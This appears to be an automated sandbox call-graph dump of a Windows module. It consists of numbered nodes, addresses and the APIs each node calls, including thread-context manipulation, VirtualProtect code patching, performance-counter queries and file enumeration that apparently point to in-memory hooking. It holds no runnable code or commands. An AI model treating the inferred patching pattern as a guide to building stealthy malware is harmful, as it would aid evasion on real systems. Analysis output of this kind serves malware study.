290edd0154a 8499->8501 8500->8498 8501->8500 8502 290edd01561 StrCmpIW 8501->8502 8503 290edd01569 StrCmpW 8501->8503 8502->8501 8503->8501 9940 290edd0ab08 9941 290edd090e4 _CreateFrameInfo 9 API calls 9940->9941 9942 290edd0ab3d 9941->9942 9943 290edd090e4 _CreateFrameInfo 9 API calls 9942->9943 9944 290edd0ab4b __except_validate_context_record 9943->9944 9945 290edd090e4 _CreateFrameInfo 9 API calls 9944->9945 9946 290edd0ab8f 9945->9946 9947 290edd090e4 _CreateFrameInfo 9 API calls 9946->9947 9948 290edd0ab98 9947->9948 9949 290edd090e4 _CreateFrameInfo 9 API calls 9948->9949 9950 290edd0aba1 9949->9950 9963 290edd096fc 9950->9963 9953 290edd090e4 _CreateFrameInfo 9 API calls 9954 290edd0abd1 __CxxCallCatchBlock 9953->9954 9955 290edd09738 __CxxCallCatchBlock 9 API calls 9954->9955 9960 290edd0ac82 9955->9960 9956 290edd0acab __CxxCallCatchBlock 9957 290edd090e4 _CreateFrameInfo 9 API calls 9956->9957 9958 290edd0acbe 9957->9958 9959 290edd090e4 _CreateFrameInfo 9 API calls 9958->9959 9961 290edd0acc7 9959->9961 9960->9956 9962 290edd08db8 __CxxCallCatchBlock 9 API calls 9960->9962 9962->9956 9964 290edd090e4 _CreateFrameInfo 9 API calls 9963->9964 9965 290edd0970d 9964->9965 9966 290edd09718 9965->9966 9967 290edd090e4 _CreateFrameInfo 9 API calls 9965->9967 9968 290edd090e4 _CreateFrameInfo 9 API calls 9966->9968 9967->9966 9969 290edd09729 9968->9969 9969->9953 9969->9954 9243 290edd14608 9246 290edd08e0c 9243->9246 9247 290edd08e24 9246->9247 9248 290edd08e36 9246->9248 9247->9248 9249 290edd08e2c 9247->9249 9250 290edd090e4 _CreateFrameInfo 9 API calls 9248->9250 9251 290edd08e34 9249->9251 9253 290edd090e4 _CreateFrameInfo 9 API calls 9249->9253 9252 290edd08e3b 9250->9252 9252->9251 9254 290edd090e4 _CreateFrameInfo 9 API calls 9252->9254 9255 290edd08e5b 9253->9255 9254->9251 9256 290edd090e4 _CreateFrameInfo 9 API calls 9255->9256 9257 290edd08e68 9256->9257 9258 290edd0c0b4 14 API calls 9257->9258 9259 290edd08e71 9258->9259 9260 290edd0c0b4 14 API calls 9259->9260 9261 290edd08e7d 9260->9261 9262 290edd0800c 9263 290edd08030 __scrt_acquire_startup_lock 9262->9263 9264 290edd0b341 9263->9264 9265 290edd0c8d0 __std_exception_copy 13 API calls 9263->9265 9266 290edd0b36a 9265->9266 9755 290edd05d8c 9756 290edd05d93 9755->9756 9757 290edd05dc0 VirtualProtect 9756->9757 9759 290edd05cd0 9756->9759 9758 290edd05de9 GetLastError 9757->9758 9757->9759 9758->9759 9970 290edd1470f 9971 290edd14728 9970->9971 9972 290edd1471e 9970->9972 9974 290edd0c36c LeaveCriticalSection 9972->9974 9267 290edd061f0 9268 290edd061fd 9267->9268 9270 290edd06209 9268->9270 9274 290edd0631a 9268->9274 9269 290edd0628d 9270->9269 9271 290edd06266 SetThreadContext 9270->9271 9271->9269 9272 290edd06341 VirtualProtect FlushInstructionCache 9272->9274 9273 290edd063fe 9275 290edd0641e 9273->9275 9283 290edd048e0 9273->9283 9274->9272 9274->9273 9287 290edd052f0 GetCurrentProcess 9275->9287 9278 290edd06477 9281 290edd07e30 _invalid_parameter_noinfo 8 API calls 9278->9281 9279 290edd06437 ResumeThread 9280 290edd06423 9279->9280 9280->9278 9280->9279 9282 290edd064bf 9281->9282 9285 290edd048fc 9283->9285 9284 290edd0495f 9284->9275 9285->9284 9286 290edd04912 VirtualFree 9285->9286 9286->9285 9288 290edd0530c 9287->9288 9289 290edd05322 VirtualProtect FlushInstructionCache 9288->9289 9290 290edd05353 9288->9290 9289->9288 9290->9280 9975 290edd024f0 9976 290edd0257b 9975->9976 9977 290edd025dd GetFileType 9976->9977 9989 290edd026ab 9976->9989 9978 290edd02601 9977->9978 9979 290edd025eb StrCpyW 9977->9979 9981 290edd01ad0 4 API calls 9978->9981 9980 290edd02610 9979->9980 9984 290edd026b0 9980->9984 9987 290edd02619 9980->9987 9981->9980 9982 290edd03d4c StrCmpNIW 9982->9984 9983 290edd03d4c StrCmpNIW 9983->9987 9984->9982 9985 290edd034d8 4 API calls 9984->9985 9986 290edd01dd0 2 API calls 9984->9986 9984->9989 9985->9984 9986->9984 9987->9983 9988 290edd034d8 4 API calls 9987->9988 9987->9989 9990 290edd01dd0 2 API calls 9987->9990 9988->9987 9990->9987 9291 290edd0e9f0 GetCommandLineA GetCommandLineW 9991 290edd0baf4 9992 290edd0bb09 9991->9992 9993 290edd0bb0d 9991->9993 9994 290edd0e624 56 API calls 9993->9994 9995 290edd0bb12 9994->9995 10006 290edd0eb88 GetEnvironmentStringsW 9995->10006 9998 290edd0bb2b 10026 290edd0bb68 9998->10026 9999 290edd0bb1f 10000 290edd0d060 __free_lconv_num 13 API calls 9999->10000 10000->9992 10003 290edd0d060 __free_lconv_num 13 API calls 10004 290edd0bb52 10003->10004 10005 290edd0d060 __free_lconv_num 13 API calls 10004->10005 10005->9992 10007 290edd0bb17 10006->10007 10008 290edd0ebb8 10006->10008 10007->9998 10007->9999 10009 290edd0eaa8 WideCharToMultiByte 10008->10009 10011 290edd0ec09 10009->10011 10010 290edd0ec13 FreeEnvironmentStringsW 10010->10007 10011->10010 10012 290edd0c390 14 API calls 10011->10012 10013 290edd0ec23 10012->10013 10014 290edd0ec34 10013->10014 10015 290edd0ec2b 10013->10015 10017 290edd0eaa8 WideCharToMultiByte 10014->10017 10016 290edd0d060 __free_lconv_num 13 API calls 10015->10016 10018 290edd0ec32 10016->10018 10019 290edd0ec57 10017->10019 10018->10010 10020 290edd0ec65 10019->10020 10021 290edd0ec5b 10019->10021 10023 290edd0d060 __free_lconv_num 13 API calls 10020->10023 10022 290edd0d060 __free_lconv_num 13 API calls 10021->10022 10024 290edd0ec63 FreeEnvironmentStringsW 10022->10024 10023->10024 10024->10007 10027 290edd0bb8d 10026->10027 10028 290edd0cfe0 __std_exception_copy 13 API calls 10027->10028 10041 290edd0bbc3 10028->10041 10029 290edd0bbcb 10030 290edd0d060 __free_lconv_num 13 API calls 10029->10030 10032 290edd0bb33 10030->10032 10031 290edd0bc2d 10033 290edd0d060 __free_lconv_num 13 API calls 10031->10033 10032->10003 10033->10032 10034 290edd0cfe0 __std_exception_copy 13 API calls 10034->10041 10035 290edd0bc52 10036 290edd0bc7c 13 API calls 10035->10036 10038 290edd0bc5a 10036->10038 10037 290edd0c0e8 __std_exception_copy 38 API calls 10037->10041 10039 290edd0d060 __free_lconv_num 13 API calls 10038->10039 10039->10029 10040 290edd0bc66 10042 290edd0ce2c _invalid_parameter_noinfo 17 API calls 10040->10042 10041->10029 10041->10031 10041->10034 10041->10035 10041->10037 10041->10040 10043 290edd0d060 __free_lconv_num 13 API calls 10041->10043 10044 290edd0bc79 10042->10044 10043->10041 9760 290edd03178 9761 290edd0319f 9760->9761 9762 290edd0326c 9761->9762 9763 290edd031bc PdhGetCounterInfoW 9761->9763 9763->9762 9764 290edd031de GetProcessHeap HeapAlloc PdhGetCounterInfoW 9763->9764 9765 290edd03210 StrCmpW 9764->9765 9766 290edd03258 GetProcessHeap HeapFree 9764->9766 9765->9766 9767 290edd03225 9765->9767 9766->9762 9767->9766 9768 290edd03720 12 API calls 9767->9768 9768->9767 9769 290edd1117c 9770 290edd1118e 9769->9770 9771 290edd111b5 9770->9771 9773 290edd111ce 9770->9773 9772 290edd0cfb4 __std_exception_copy 13 API calls 9771->9772 9774 290edd111ba 9772->9774 9775 290edd0db38 14 API calls 9773->9775 9777 290edd111c5 9773->9777 9776 290edd0ce0c _invalid_parameter_noinfo 38 API calls 9774->9776 9775->9777 9776->9777 9778 290edd07d20 9779 290edd07d41 9778->9779 9780 290edd07d3c 9778->9780 9782 290edd07e50 9780->9782 9783 290edd07e73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9782->9783 9784 290edd07ee7 9782->9784 9783->9784 9784->9779 10045 290edd02aa0 10047 290edd02ae6 10045->10047 10046 290edd02b4c 10047->10046 10048 290edd03d4c StrCmpNIW 10047->10048 10048->10047 9785 290edd13720 9795 290edd08a60 9785->9795 9787 290edd13748 9789 290edd090e4 _CreateFrameInfo 9 API calls 9790 290edd13758 9789->9790 9791 290edd090e4 _CreateFrameInfo 9 API calls 9790->9791 9792 290edd13761 9791->9792 9793 290edd0c0b4 14 API calls 9792->9793 9794 290edd1376a 9793->9794 9796 290edd08a90 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9795->9796 9797 290edd08b91 9796->9797 9798 290edd08b54 RtlUnwindEx 9796->9798 9797->9787 9797->9789 9798->9796 10049 290edd104a0 10050 290edd104a9 10049->10050 10052 290edd104b9 10049->10052 10051 290edd0cfb4 __std_exception_copy 13 API calls 10050->10051 10053 290edd104ae 10051->10053 10054 290edd0ce0c _invalid_parameter_noinfo 38 API calls 10053->10054 10054->10052 9292 290edd061a3 9293 290edd061b0 9292->9293 9294 290edd061bc GetThreadContext 9293->9294 9295 290edd0631a 9293->9295 9294->9295 9296 290edd061e2 9294->9296 9298 290edd06341 VirtualProtect FlushInstructionCache 9295->9298 9300 290edd063fe 9295->9300 9296->9295 9297 290edd06209 9296->9297 9303 290edd06266 SetThreadContext 9297->9303 9306 290edd0628d 9297->9306 9298->9295 9299 290edd0641e 9301 290edd052f0 3 API calls 9299->9301 9300->9299 9302 290edd048e0 VirtualFree 9300->9302 9307 290edd06423 9301->9307 9302->9299 9303->9306 9304 290edd06477 9308 290edd07e30 _invalid_parameter_noinfo 8 API calls 9304->9308 9305 290edd06437 ResumeThread 9305->9307 9307->9304 9307->9305 9309 290edd064bf 9308->9309 9310 290edd0f1a4 9311 290edd0f1dd 9310->9311 9312 290edd0f1ae 9310->9312 9312->9311 9313 290edd0f1c3 FreeLibrary 9312->9313 9313->9312 9314 290edd131a4 9315 290edd131b5 CloseHandle 9314->9315 9316 290edd131bb 9314->9316 9315->9316 9317 290edd0b5aa 9318 290edd0c0b4 14 API calls 9317->9318 9319 290edd0b5af 9318->9319 9320 290edd0b5d5 GetModuleHandleW 9319->9320 9321 290edd0b61f 9319->9321 9320->9321 9325 290edd0b5e2 9320->9325 9334 290edd0b4b8 9321->9334 9325->9321 9329 290edd0b6c4 GetModuleHandleExW 9325->9329 9330 290edd0b6f8 GetProcAddress 9329->9330 9331 290edd0b70a 9329->9331 9330->9331 9332 290edd0b722 9331->9332 9333 290edd0b71b FreeLibrary 9331->9333 9332->9321 9333->9332 9346 290edd0c318 EnterCriticalSection 9334->9346 8504 290edd0242c GetProcessIdOfThread GetCurrentProcessId 8505 290edd02457 CreateFileW 8504->8505 8507 290edd024d2 8504->8507 8506 290edd0248b WriteFile ReadFile CloseHandle 8505->8506 8505->8507 8506->8507 10058 290edd08490 10059 290edd08e80 __std_exception_copy 38 API calls 10058->10059 10060 290edd084b9 10059->10060 9347 290edd11790 9350 290edd0e624 9347->9350 9351 290edd0e631 9350->9351 9355 290edd0e676 9350->9355 9356 290edd0c88c 9351->9356 9353 290edd0e660 9361 290edd0e2fc 9353->9361 9357 290edd0c8a8 FlsGetValue 9356->9357 9358 290edd0c8a4 9356->9358 9357->9358 9359 290edd0c8be 9358->9359 9360 290edd0c700 __std_exception_copy 13 API calls 9358->9360 9359->9353 9360->9359 9384 290edd0e56c 9361->9384 9366 290edd0c390 14 API calls 9367 290edd0e35f 9366->9367 9368 290edd0e367 9367->9368 9370 290edd0e376 9367->9370 9369 290edd0d060 __free_lconv_num 13 API calls 9368->9369 9380 290edd0e34e 9369->9380 9370->9370 9403 290edd0e6a0 9370->9403 9373 290edd0e472 9374 290edd0cfb4 __std_exception_copy 13 API calls 9373->9374 9376 290edd0e477 9374->9376 9375 290edd0e4cd 9379 290edd0e534 9375->9379 9414 290edd0de1c 9375->9414 9377 290edd0d060 __free_lconv_num 13 API calls 9376->9377 9377->9380 9378 290edd0e48c 9378->9375 9381 290edd0d060 __free_lconv_num 13 API calls 9378->9381 9383 290edd0d060 __free_lconv_num 13 API calls 9379->9383 9380->9355 9381->9375 9383->9380 9385 290edd0e58f 9384->9385 9391 290edd0e599 9385->9391 9429 290edd0c318 EnterCriticalSection 9385->9429 9392 290edd0c88c 14 API calls 9391->9392 9395 290edd0e331 9391->9395 9393 290edd0e660 9392->9393 9394 290edd0e2fc 56 API calls 9393->9394 9394->9395 9396 290edd0dfec 9395->9396 9397 290edd0db38 14 API calls 9396->9397 9398 290edd0e000 9397->9398 9399 290edd0e00c GetOEMCP 9398->9399 9400 290edd0e01e 9398->9400 9402 290edd0e033 9399->9402 9401 290edd0e023 GetACP 9400->9401 9400->9402 9401->9402 9402->9366 9402->9380 9404 290edd0dfec 16 API calls 9403->9404 9405 290edd0e6db 9404->9405 9406 290edd0e831 9405->9406 9408 290edd0e718 IsValidCodePage 9405->9408 9413 290edd0e732 9405->9413 9407 290edd07e30 _invalid_parameter_noinfo 8 API calls 9406->9407 9409 290edd0e469 9407->9409 9408->9406 9410 290edd0e729 9408->9410 9409->9373 9409->9378 9411 290edd0e758 GetCPInfo 9410->9411 9410->9413 9411->9406 9411->9413 9430 290edd0e104 9413->9430 9503 290edd0c318 EnterCriticalSection 9414->9503 9431 290edd0e14f GetCPInfo 9430->9431 9440 290edd0e245 9430->9440 9436 290edd0e162 9431->9436 9431->9440 9432 290edd07e30 _invalid_parameter_noinfo 8 API calls 9434 290edd0e2e4 9432->9434 9434->9406 9441 290edd11234 9436->9441 9439 290edd116f8 33 API calls 9439->9440 9440->9432 9442 290edd0db38 14 API calls 9441->9442 9443 290edd11276 9442->9443 9444 290edd0ea18 MultiByteToWideChar 9443->9444 9446 290edd112ac 9444->9446 9445 290edd112b3 9448 290edd07e30 _invalid_parameter_noinfo 8 API calls 9445->9448 9446->9445 9447 290edd0c390 14 API calls 9446->9447 9449 290edd11370 9446->9449 9452 290edd112dc 9446->9452 9447->9452 9450 290edd0e1d9 9448->9450 9449->9445 9451 290edd0d060 __free_lconv_num 13 API calls 9449->9451 9456 290edd116f8 9450->9456 9451->9445 9452->9449 9453 290edd0ea18 MultiByteToWideChar 9452->9453 9454 290edd11352 9453->9454 9454->9449 9455 290edd11356 GetStringTypeW 9454->9455 9455->9449 9457 290edd0db38 14 API calls 9456->9457 9458 290edd1171d 9457->9458 9461 290edd113c4 9458->9461 9462 290edd11405 9461->9462 9463 290edd0ea18 MultiByteToWideChar 9462->9463 9464 290edd1144f 9463->9464 9466 290edd11585 9464->9466 9468 290edd116cd 9464->9468 9469 290edd0c390 14 API calls 9464->9469 9471 290edd11487 9464->9471 9465 290edd07e30 _invalid_parameter_noinfo 8 API calls 9467 290edd0e20c 9465->9467 9466->9468 9470 290edd0d060 __free_lconv_num 13 API calls 9466->9470 9467->9439 9468->9465 9469->9471 9470->9468 9471->9466 9472 290edd0ea18 MultiByteToWideChar 9471->9472 9473 290edd114fa 9472->9473 9473->9466 9492 290edd0efd8 9473->9492 9475 290edd1152d 9475->9466 9476 290edd11545 9475->9476 9477 290edd11596 9475->9477 9476->9466 9479 290edd0efd8 10 API calls 9476->9479 9478 290edd0c390 14 API calls 9477->9478 9480 290edd11668 9477->9480 9481 290edd115b4 9477->9481 9478->9481 9479->9466 9480->9466 9482 290edd0d060 __free_lconv_num 13 API calls 9480->9482 9481->9466 9483 290edd0efd8 10 API calls 9481->9483 9482->9466 9484 290edd11634 9483->9484 9484->9480 9485 290edd11654 9484->9485 9486 290edd1166a 9484->9486 9487 290edd0eaa8 WideCharToMultiByte 9485->9487 9488 290edd0eaa8 WideCharToMultiByte 9486->9488 9489 290edd11662 9487->9489 9488->9489 9489->9480 9490 290edd11682 9489->9490 9490->9466 9491 290edd0d060 __free_lconv_num 13 API calls 9490->9491 9491->9466 9493 290edd0f004 9492->9493 9497 290edd0f027 9492->9497 9496 290edd0ed48 9 API calls 9493->9496 9498 290edd0f02f 9493->9498 9495 290edd0f08d LCMapStringW 9495->9498 9496->9497 9497->9498 9499 290edd0f0cc 9497->9499 9498->9475 9500 290edd0f0e8 9499->9500 9501 290edd0f10a 9499->9501 9500->9501 9502 290edd0ed48 9 API calls 9500->9502 9501->9495 9502->9501 8508 290edd02214 8509 290edd02245 8508->8509 8510 290edd02326 8509->8510 8511 290edd0235b 8509->8511 8517 290edd02269 8509->8517 8512 290edd02360 8511->8512 8513 290edd023cf 8511->8513 8525 290edd03398 GetProcessHeap HeapAlloc 8512->8525 8513->8510 8516 290edd03398 11 API calls 8513->8516 8515 290edd022a1 StrCmpNIW 8515->8517 8516->8510 8517->8510 8517->8515 8519 290edd01d2c 8517->8519 8520 290edd01db0 8519->8520 8521 290edd01d53 GetProcessHeap HeapAlloc 8519->8521 8520->8517 8521->8520 8522 290edd01d8e 8521->8522 8523 290edd01cf8 2 API calls 8522->8523 8524 290edd01d96 GetProcessHeap HeapFree 8523->8524 8524->8520 8530 290edd033eb 8525->8530 8526 290edd034a9 GetProcessHeap HeapFree 8526->8510 8527 290edd034a4 8527->8526 8528 290edd03436 StrCmpNIW 8528->8530 8529 290edd01d2c 6 API calls 8529->8530 8530->8526 8530->8527 8530->8528 8530->8529 10061 290edd0ae94 10065 290edd0adc7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 10061->10065 10062 290edd0aebb 10063 290edd090e4 _CreateFrameInfo 9 API calls 10062->10063 10064 290edd0aec0 10063->10064 10066 290edd090e4 _CreateFrameInfo 9 API calls 10064->10066 10067 290edd0aecb __FrameHandler3::GetHandlerSearchState 10064->10067 10065->10062 10065->10067 10068 290edd0978c 9 API calls Is_bad_exception_allowed 10065->10068 10069 290edd097b4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 10065->10069 10066->10067 10068->10065 10069->10065 8531 290edd0d418 8532 290edd0d43d 8531->8532 8536 290edd0d454 8531->8536 8533 290edd0cfb4 __std_exception_copy 13 API calls 8532->8533 8535 290edd0d442 8533->8535 8534 290edd0d4e4 8666 290edd0b914 8534->8666 8564 290edd0ce0c 8535->8564 8536->8534 8546 290edd0d49a 8536->8546 8548 290edd0d576 8536->8548 8567 290edd0d654 8536->8567 8629 290edd0d7d8 8536->8629 8541 290edd0d544 8544 290edd0d060 __free_lconv_num 13 API calls 8541->8544 8543 290edd0d5f6 8545 290edd0d060 __free_lconv_num 13 API calls 8543->8545 8547 290edd0d54b 8544->8547 8558 290edd0d601 8545->8558 8553 290edd0d060 __free_lconv_num 13 API calls 8546->8553 8559 290edd0d4bd 8546->8559 8554 290edd0d060 __free_lconv_num 13 API calls 8547->8554 8547->8559 8552 290edd0d060 __free_lconv_num 13 API calls 8548->8552 8548->8559 8549 290edd0d597 8549->8543 8549->8549 8561 290edd0d63c 8549->8561 8672 290edd10c78 8549->8672 8550 290edd0d060 __free_lconv_num 13 API calls 8560 290edd0d44d 8550->8560 8551 290edd0d61a 8556 290edd0d060 __free_lconv_num 13 API calls 8551->8556 8552->8548 8553->8546 8554->8547 8555 290edd0d060 __free_lconv_num 13 API calls 8555->8558 8556->8560 8558->8551 8558->8555 8559->8550 8681 290edd0ce2c IsProcessorFeaturePresent 8561->8681 8685 290edd0ccb8 8564->8685 8568 290edd0d682 8567->8568 8568->8568 8569 290edd0d69e 8568->8569 8570 290edd0cfe0 __std_exception_copy 13 API calls 8568->8570 8569->8536 8571 290edd0d6cd 8570->8571 8572 290edd0d6e6 8571->8572 8573 290edd10c78 38 API calls 8571->8573 8574 290edd10c78 38 API calls 8572->8574 8576 290edd0d7bc 8572->8576 8573->8572 8575 290edd0d703 8574->8575 8575->8576 8578 290edd0d73f 8575->8578 8579 290edd0d722 8575->8579 8580 290edd0d74d 8575->8580 8577 290edd0ce2c _invalid_parameter_noinfo 17 API calls 8576->8577 8589 290edd0d7d7 8577->8589 8583 290edd0d060 __free_lconv_num 13 API calls 8578->8583 8582 290edd0cfe0 __std_exception_copy 13 API calls 8579->8582 8581 290edd0d737 8580->8581 8751 290edd0eca0 8580->8751 8581->8578 8586 290edd0d060 __free_lconv_num 13 API calls 8581->8586 8587 290edd0d72d 8582->8587 8583->8576 8585 290edd0d83a 8594 290edd0d84c 8585->8594 8598 290edd0d861 8585->8598 8586->8578 8590 290edd0d060 __free_lconv_num 13 API calls 8587->8590 8588 290edd0d775 8591 290edd0d790 8588->8591 8592 290edd0d77a 8588->8592 8589->8585 8760 290edd11198 8589->8760 8590->8581 8596 290edd0d060 __free_lconv_num 13 API calls 8591->8596 8595 290edd0d060 __free_lconv_num 13 API calls 8592->8595 8597 290edd0d654 52 API calls 8594->8597 8595->8581 8596->8578 8611 290edd0d85c 8597->8611 8769 290edd0db38 8598->8769 8599 290edd07e30 _invalid_parameter_noinfo 8 API calls 8601 290edd0db24 8599->8601 8601->8536 8604 290edd0d8da 8781 290edd0d0cc 8604->8781 8607 290edd0d968 8608 290edd0d654 52 API calls 8607->8608 8609 290edd0d978 8608->8609 8609->8611 8612 290edd0d060 __free_lconv_num 13 API calls 8609->8612 8610 290edd0db38 14 API calls 8617 290edd0d992 8610->8617 8611->8599 8612->8611 8613 290edd0ef58 9 API calls 8613->8617 8615 290edd0d654 52 API calls 8615->8617 8616 290edd0da88 FindNextFileW 8616->8617 8618 290edd0daa0 8616->8618 8617->8610 8617->8613 8617->8615 8617->8616 8619 290edd0daea 8617->8619 8622 290edd0d060 13 API calls __free_lconv_num 8617->8622 8803 290edd0d26c 8617->8803 8620 290edd0dacc FindClose 8618->8620 8825 290edd108e0 8618->8825 8621 290edd0daf8 FindClose 8619->8621 8625 290edd0d060 __free_lconv_num 13 API calls 8619->8625 8620->8611 8624 290edd0dadc 8620->8624 8621->8611 8626 290edd0db08 8621->8626 8622->8617 8628 290edd0d060 __free_lconv_num 13 API calls 8624->8628 8625->8621 8627 290edd0d060 __free_lconv_num 13 API calls 8626->8627 8627->8611 8628->8611 8630 290edd0d818 8629->8630 8631 290edd0d83a 8629->8631 8630->8631 8632 290edd11198 38 API calls 8630->8632 8633 290edd0d84c 8631->8633 8635 290edd0d861 8631->8635 8632->8630 8634 290edd0d654 56 API calls 8633->8634 8636 290edd0d85c 8634->8636 8638 290edd0db38 14 API calls 8635->8638 8637 290edd07e30 _invalid_parameter_noinfo 8 API calls 8636->8637 8639 290edd0db24 8637->8639 8640 290edd0d8cb 8638->8640 8639->8536 8641 290edd0d8da 8640->8641 8642 290edd0ef58 9 API calls 8640->8642 8643 290edd0d0cc 16 API calls 8641->8643 8642->8641 8644 290edd0d93b FindFirstFileExW 8643->8644 8645 290edd0d968 8644->8645 8654 290edd0d992 8644->8654 8646 290edd0d654 56 API calls 8645->8646 8647 290edd0d978 8646->8647 8647->8636 8649 290edd0d060 __free_lconv_num 13 API calls 8647->8649 8648 290edd0db38 14 API calls 8648->8654 8649->8636 8650 290edd0ef58 9 API calls 8650->8654 8651 290edd0d26c 16 API calls 8651->8654 8652 290edd0d654 56 API calls 8652->8654 8653 290edd0da88 FindNextFileW 8653->8654 8655 290edd0daa0 8653->8655 8654->8648 8654->8650 8654->8651 8654->8652 8654->8653 8656 290edd0d060 13 API calls __free_lconv_num 8654->8656 8657 290edd0daea 8654->8657 8658 290edd0dacc FindClose 8655->8658 8660 290edd108e0 38 API calls 8655->8660 8656->8654 8659 290edd0daf8 FindClose 8657->8659 8662 290edd0d060 __free_lconv_num 13 API calls 8657->8662 8658->8636 8661 290edd0dadc 8658->8661 8659->8636 8663 290edd0db08 8659->8663 8660->8658 8665 290edd0d060 __free_lconv_num 13 API calls 8661->8665 8662->8659 8664 290edd0d060 __free_lconv_num 13 API calls 8663->8664 8664->8636 8665->8636 8667 290edd0b92c 8666->8667 8671 290edd0b964 8666->8671 8668 290edd0cfe0 __std_exception_copy 13 API calls 8667->8668 8667->8671 8669 290edd0b95a 8668->8669 8670 290edd0d060 __free_lconv_num 13 API calls 8669->8670 8670->8671 8671->8541 8671->8549 8675 290edd10c95 8672->8675 8673 290edd10c9a 8674 290edd0cfb4 __std_exception_copy 13 API calls 8673->8674 8677 290edd10cb0 8673->8677 8680 290edd10ca4 8674->8680 8675->8673 8675->8677 8678 290edd10ce4 8675->8678 8676 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8676->8677 8677->8549 8678->8677 8679 290edd0cfb4 __std_exception_copy 13 API calls 8678->8679 8679->8680 8680->8676 8682 290edd0ce3f 8681->8682 8892 290edd0cb40 8682->8892 8686 290edd0cce3 8685->8686 8693 290edd0cd54 8686->8693 8688 290edd0cd0a 8690 290edd0cd2d 8688->8690 8703 290edd0c1a0 8688->8703 8691 290edd0c1a0 _invalid_parameter_noinfo 17 API calls 8690->8691 8692 290edd0cd42 8690->8692 8691->8692 8692->8560 8716 290edd0ca88 8693->8716 8698 290edd0ce2c _invalid_parameter_noinfo 17 API calls 8700 290edd0ce0a 8698->8700 8699 290edd0cd8f 8699->8688 8701 290edd0ccb8 _invalid_parameter_noinfo 38 API calls 8700->8701 8702 290edd0ce25 8701->8702 8702->8688 8704 290edd0c1f8 8703->8704 8705 290edd0c1af GetLastError 8703->8705 8704->8690 8706 290edd0c1c4 8705->8706 8707 290edd0c960 _invalid_parameter_noinfo 14 API calls 8706->8707 8708 290edd0c1de SetLastError 8707->8708 8708->8704 8709 290edd0c201 8708->8709 8710 290edd0c1a0 _invalid_parameter_noinfo 15 API calls 8709->8710 8711 290edd0c227 8710->8711 8730 290edd0fda8 8711->8730 8717 290edd0caa4 GetLastError 8716->8717 8718 290edd0cadf 8716->8718 8719 290edd0cab4 8717->8719 8718->8699 8722 290edd0caf4 8718->8722 8725 290edd0c960 8719->8725 8723 290edd0cb10 GetLastError SetLastError 8722->8723 8724 290edd0cb28 8722->8724 8723->8724 8724->8698 8724->8699 8726 290edd0c988 FlsGetValue 8725->8726 8727 290edd0c984 8725->8727 8726->8727 8728 290edd0c700 __std_exception_copy 13 API calls 8727->8728 8729 290edd0c99e SetLastError 8727->8729 8728->8729 8729->8718 8731 290edd0fdc1 8730->8731 8732 290edd0c24f 8730->8732 8731->8732 8738 290edd10800 8731->8738 8734 290edd0fe14 8732->8734 8735 290edd0c25f 8734->8735 8736 290edd0fe2d 8734->8736 8735->8690 8736->8735 8748 290edd0e684 8736->8748 8739 290edd0c870 _invalid_parameter_noinfo 14 API calls 8738->8739 8740 290edd1080f 8739->8740 8746 290edd10855 8740->8746 8747 290edd0c318 EnterCriticalSection 8740->8747 8746->8732 8749 290edd0c870 _invalid_parameter_noinfo 14 API calls 8748->8749 8750 290edd0e68d 8749->8750 8752 290edd0ecc2 8751->8752 8753 290edd0ecdf 8751->8753 8752->8753 8754 290edd0ecd0 8752->8754 8757 290edd0ece9 8753->8757 8833 290edd117b0 8753->8833 8755 290edd0cfb4 __std_exception_copy 13 API calls 8754->8755 8759 290edd0ecd5 8755->8759 8840 290edd11800 8757->8840 8759->8588 8761 290edd111a0 8760->8761 8762 290edd111b5 8761->8762 8764 290edd111ce 8761->8764 8763 290edd0cfb4 __std_exception_copy 13 API calls 8762->8763 8765 290edd111ba 8763->8765 8766 290edd0db38 14 API calls 8764->8766 8768 290edd111c5 8764->8768 8767 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8765->8767 8766->8768 8767->8768 8768->8589 8770 290edd0db5c 8769->8770 8776 290edd0d8cb 8769->8776 8771 290edd0c870 _invalid_parameter_noinfo 14 API calls 8770->8771 8770->8776 8772 290edd0db77 8771->8772 8859 290edd0fd74 8772->8859 8776->8604 8777 290edd0ef58 8776->8777 8778 290edd0ef69 8777->8778 8779 290edd0ef8a 8777->8779 8778->8779 8867 290edd0ed48 8778->8867 8779->8604 8782 290edd0d11a 8781->8782 8783 290edd0d0f6 8781->8783 8784 290edd0d17f 8782->8784 8785 290edd0d11f 8782->8785 8786 290edd0d060 __free_lconv_num 13 API calls 8783->8786 8792 290edd0d105 FindFirstFileExW 8783->8792 8886 290edd0ea18 8784->8886 8788 290edd0d134 8785->8788 8789 290edd0d060 __free_lconv_num 13 API calls 8785->8789 8785->8792 8786->8792 8790 290edd0c390 14 API calls 8788->8790 8789->8788 8790->8792 8792->8607 8792->8617 8804 290edd0d296 8803->8804 8805 290edd0d2ba 8803->8805 8808 290edd0d060 __free_lconv_num 13 API calls 8804->8808 8810 290edd0d2a5 8804->8810 8806 290edd0d2c0 8805->8806 8807 290edd0d31f 8805->8807 8806->8810 8811 290edd0d2d5 8806->8811 8813 290edd0d060 __free_lconv_num 13 API calls 8806->8813 8889 290edd0eaa8 8807->8889 8808->8810 8810->8617 8814 290edd0c390 14 API calls 8811->8814 8813->8811 8814->8810 8826 290edd10912 8825->8826 8827 290edd0cfb4 __std_exception_copy 13 API calls 8826->8827 8832 290edd10927 8826->8832 8828 290edd1091c 8827->8828 8829 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8828->8829 8829->8832 8830 290edd07e30 _invalid_parameter_noinfo 8 API calls 8831 290edd10c68 8830->8831 8831->8620 8832->8830 8834 290edd117d2 HeapSize 8833->8834 8835 290edd117b9 8833->8835 8836 290edd0cfb4 __std_exception_copy 13 API calls 8835->8836 8837 290edd117be 8836->8837 8838 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8837->8838 8839 290edd117c9 8838->8839 8839->8757 8841 290edd11815 8840->8841 8842 290edd1181f 8840->8842 8852 290edd0c390 8841->8852 8844 290edd11824 8842->8844 8850 290edd1182b __std_exception_copy 8842->8850 8845 290edd0d060 __free_lconv_num 13 API calls 8844->8845 8848 290edd1181d 8845->8848 8846 290edd11831 8849 290edd0cfb4 __std_exception_copy 13 API calls 8846->8849 8847 290edd1185e HeapReAlloc 8847->8848 8847->8850 8848->8759 8849->8848 8850->8846 